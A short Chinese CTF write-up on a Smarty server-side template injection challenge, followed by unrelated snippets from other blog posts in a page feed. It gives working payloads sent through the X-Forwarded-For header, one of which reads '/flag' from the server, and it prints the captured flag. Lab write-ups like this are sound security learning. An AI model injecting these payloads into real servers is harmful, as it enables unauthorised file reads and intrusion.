张小明
前端开发工程师
打开题目,看到末尾
Build With Smarty !
推测 Smarty 模板注入 看了wphttps://blog.csdn.net/kw741951/article/details/141001010
smart是php的模板引擎,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造ssti:payload。
开始用bp抓包,然后插入X-Forwarded-For:{$smarty.version}来看一下版本。
插入X-Forwarded-For:{if readfile('/flag')}{/if}
得到flag
flag{305f86a9-ae64-418f-8190-52dd563ee618}
对于想入行网络安全的新人来说,最常困惑的问题莫过于:“零基础转行,需要学习多久才能上手?” 其实,网络安全入门门槛比想象中低,关键在于理清技术领域的分类特点,再制定科学的学习路径。 只要…
李华
多GPU分布式推理实战指南:从零搭建高性能AI推理系统 【免费下载链接】Qwen3-30B-A3B Qwen3-30B-A3B具有以下特点: 类型:因果语言模型 训练阶段:预训练和后训练 参数数量:总计 305 亿,其中已激活 33 亿 参数…
李华
1.上篇提到无序数组用sort排序再二分,感觉被自己蠢笑了,因为sort函数的时间复杂度O(nlogn),二分查找是(logn),所以这个是无意义的。然后上一篇sort函数用法也写错了,应该是sort(a1, a n1),因为初始下标为1,注意一下就…
李华
5分钟掌握AutoHotkey:打造专属自动化神器 【免费下载链接】AutoHotkey 项目地址: https://gitcode.com/gh_mirrors/autohotke/AutoHotkey 你是否厌倦了日复一日的重复点击操作?想要一键完成复杂的鼠标任务?AutoHotkey这款强大的自动化…
李华
RaceControl终极指南:告别F1TV官方客户端的所有痛点 【免费下载链接】RaceControl Race Control is a standalone, open source F1TV client for Windows, written in C# on the .NET platform. 项目地址: https://gitcode.com/gh_mirrors/ra/RaceControl 还…
李华
在当今复杂的云原生环境中,系统产生的日志数据如同散落在沙滩上的贝壳,看似零散却蕴含着宝贵的业务洞察。传统的日志分析工具往往只能提供单维度的查询能力,难以将不同来源的数据关联起来形成完整的业务视图。ZincObserve作为新一代可观测性平…
李华